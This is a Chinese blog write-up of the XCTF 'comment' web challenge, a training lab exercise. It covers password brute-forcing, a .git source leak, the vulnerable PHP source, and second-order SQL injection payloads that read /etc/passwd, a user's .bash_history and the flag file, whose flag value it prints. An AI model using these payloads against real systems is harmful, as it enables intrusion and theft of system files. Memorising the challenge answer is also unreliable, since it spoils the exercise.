攻防世界高手进阶之Web comment

最新推荐文章于 2024-01-28 14:00:27 发布
最新推荐文章于 2024-01-28 14:00:27 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43093631/article/details/106650625
版权

攻防世界高手进阶之Web comment

这题我在网上没找到Writeup,所有花了8金币买的。
这题主要考点
爆破
git泄露
代码审计
SQL注入
登陆页面
可以看到账号框账号为:zhangwei 密码为zhangwei***
所以需要爆破zhangwei后面的三位数,我当时没想到这点看wp才明白的
user:zhangwei pass:zhangwei666
然后扫描目录的时候发现.git文件然后应该是有git源码泄露,过扫描发现到一个write_do.php文件
在这里插入图片描述
登陆成功后看到可以发帖加上题目提示sql,猜测应该是sql注入
在这里插入图片描述
后面的就是看着wp做的
刚才发现一篇文章讲解的非常不错,也让明白了更多,貌似是下载的write_do.php代码不是很完整这也让明白了一些之前的疑惑

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

参考:2018网鼎杯 三道web题 记录~~(二次注入)
在这里插入图片描述
这里也解释了为什么后面要在提交留言输入*/#,因为不是单行所以需要多行注释
查询passwd;’,content=(select load_file(’//etc/passwd’)),/*
在这里插入图片描述
提交留言*/#来闭合注入语句
在这里插入图片描述
在这里插入图片描述
读取www用户的/bin/bash_history:’,content=(select load_file(’//home/www/.bash_history’)),/*

查询.DS_Store文件:’,content=(select hex(load_file(’//tmp/html/.DS_Store’))),/*

十六进制文件读取
将得到的16进制字符串转换,得到flag文件路径

读取flag文件:’,content=(select hex(load_file(’//var/www/html/flag_8946e1ff1ee3e40f.php’))),/*
将得到的16进制字符串转换,得到flag## 新的改变
在这里插入图片描述
$flag=“flag{0dd14aae81d94904b3492117e2a3d4df}”;

晚上8点睡觉
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶区 7分题 comment
闵行小鱼塘
08-11 710
继续ctf的旅程,攻防世界web高手进阶区的7分题,本文是comment的writeup
攻防世界web进阶comment详解
hxhxhxhxx的博客
08-11 1434
攻防世界web进阶comment详解题目详解cp:.DS_Store 题目 详解 只要我们输入任何一个评论,他就会让我们进行登录, 我们可以通过他的文字提示,发现少了三位,一般我们都会上数字 我们发现他666的时候有一个302的跳转 登录以后,感觉也没有什么可以注入的 正常也没有回显,这时候,我们的御剑传来了好消息 有个.git,应该是git源码泄露。使用githack 下载源代码。 <?php include "mysql.php"; session_start(); if($_SESS
攻防世界-comment
xixihahawuwu的博客
12-15 215
一个留言板扫描目录,发现存在login.php界面。访问 给了我们一个并不完整的登录信息 爆破得到后三位密码666登录成功后发现返回之前的首页 根据题目描述,存在sql注入 扫描目录 发现存在git源码泄露 扒取源码发现write_do.php文件没有什么信息 检查页面元素时发现我们得到的码是不完整的,需要修复 修复完的源码如下: <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ hea
攻防世界comment
qq_44065556的博客
09-16 465
刚进入看见画面 然后发现页面需要登录 输入框似乎给了提示 burp抓取 弱口令爆破 从爆破情况来看 密码应该是zhangwei666 登录后也没发现什么可以注入 也没有什么变化 习惯性的用dirsearch 扫一下 可以看到.git出现了 那应该是git源码泄露了, 用githack抓下来 我们查看我们抓下来的文件 可以判断 他的源码不完整 缺失了 用脚本给它补上 参考 -> CTF中的git泄露题目 - Tkitn - 博客园 ...
攻防世界 WEB COMMENT
qq_41696858的博客
09-04 300
三个点,git源码泄露,密码爆破,sql二次注入 点进去一个留言窗口,看了看源码,没啥 那就dirsearch扫一波,扫出来一堆git,那么就尝试GitHacker看看能不能跑出来源码 githacker --url http://111.200.241.244:49854/ --folder result3 进到result3里面发现一个write_do.php 看了看源码,明显没写完,case下面直接break 之前扫目录的时候还扫出来一个login.php,进去看看,发现用户名zhangwei,密码z
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
黑客攻防入门与进阶
12-16
黑客攻防入门与进阶..
攻防世界 comment
CyhDl666的博客
02-26 478
进去是个留言板页面 发帖需要登录 未登录回跳转到登录页面 一不做二不休 直接dirsearch扫描一下 看看有哪些文件 芜湖!意外发现git泄露!! 还扫到了个mysql.php???访问好像没啥子用 以后再说 GitHack 下载了一下 发现只下载了给write_do.php 代码贴下 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./log.
xctf攻防世界 Web高手进阶comment
l8947943的博客
01-06 3323
1. 进入环境,查看内容 跳转到login.php 入手点是想办法登录后,再进行操作。 接下来一顿扫描瞅瞅: 2. 问题分析 想办法先登入进去 我们看到文本框提示已经给了zhangwei,密码是zhangwei***,其实就是三位字符补充,在此我们借助burpsuite进行跑字典,如图: 添加payloads,如图: Start attack!慢慢等吧,巨慢,如图: 发现当***为666时候请求302了,emmm,走起,如图: 利用.git获取源码 想到前面dirsearch出来的内容,根
攻防世界Webcomment
Light_inthe_eyes的博客
11-03 219
发帖需要登录,提示了我们账户时zhangwei,密码是zhangweixxx,果断暴力破解,得到密码是zhangwei666: 然后发帖,想找到SQL的注入点,可是就是找不到,就翻了翻源代码,在控制台中发现了关键的提示: 提示了.git源码泄露,用御剑也得到了/.git,使用githacker看代码: 没看出什么来,突然想到前面说commit丢失了,那就要将它补上,涉及git修复,给个师傅的修复脚本:git修复 <?php include "mysql.php"; session_start(); i
攻防世界-WEB-comment
最新发布
m0_52061428的博客
01-28 1521
write’操作将用户通过POST方法提交的数据插入到名为’board’的数据库表中,而’comment’操作将用户通过POST方法提交的评论数据插入到名为’comment’的数据库表中。而在comment中,由于他并未对category使用这个函数,原因可能是在comment.php中,我们并不能直接使用category。也就是说,我们可以通过查看www的历史记录以获取一些关键信息,这里我们需要知道的是flag在哪里。一般来说,bash的历史记录保存在home/用户/.bash_history中。
WebComponent简介和使用
我欲乘风破浪
04-15 9189
文章目录什么是组件化阻碍前端组件化的因素webComponent组件化开发实现使用template创建模板创建一个相关的class类直接使用 WebComponent能够提供开发者组件化开发的能力 什么是组件化 组件化没有一个明确的定义,但是一般形容就是:“高内聚,低耦合”,对内各个元素彼此紧密结合、相互依赖,对外和其他组件的联系最少且接口简单。 阻碍前端组件化的因素 在前端虽然HTML、CSS和...
攻防世界-Web-lottery(.git泄露、php源码审计、弱类型利用)-XCTF 4th-QCTF-2018
Sea_Sand息禅
04-26 4514
扫描目录,发现.git泄露: 提取.git泄露的源码,得到许多文件: 网站这里: 应该是买到手之后就能拿到flag,如果是这个flag就在.git里,那就好办了,尝试配合grep命令在这些文件中查找flag,并没有结果,要想有钱买flag,首页就给我们提供了一个方法: 买彩票猜数就行了,但是怎么能猜对?这就要审计一下代码,找找漏洞了。 经过一番审计,猜数字对应的函数在api.ph...
攻防世界 web进阶笔记
weixin_43928140的博客
06-03 1832
0x02 NaNNaNNaNNaN-Batman 首先下载附件得到web100,用notepad++打开看下,是一些js乱码 我把源码贴到下面 <script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg...
XCTF WEB mfw
A_dmin的博客
06-03 4463
XCTF WEB mfw 比赛打自闭了,需要好好学习 打开网页看见(猜测git源码泄露): 在URL后面加上./git发现: 使用脚本,在Linux环境中: pip install requests git clone https://github.com/wangyihang/GitHacker.git python GitHacker.py [Website] 得到源码: flag...
攻防世界 - NewsCenter - WriteUp
哒君的博客
06-08 1万+
NewsCenter 这一题考察的是 SQL 注入 首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据 然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容 再用 ...
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值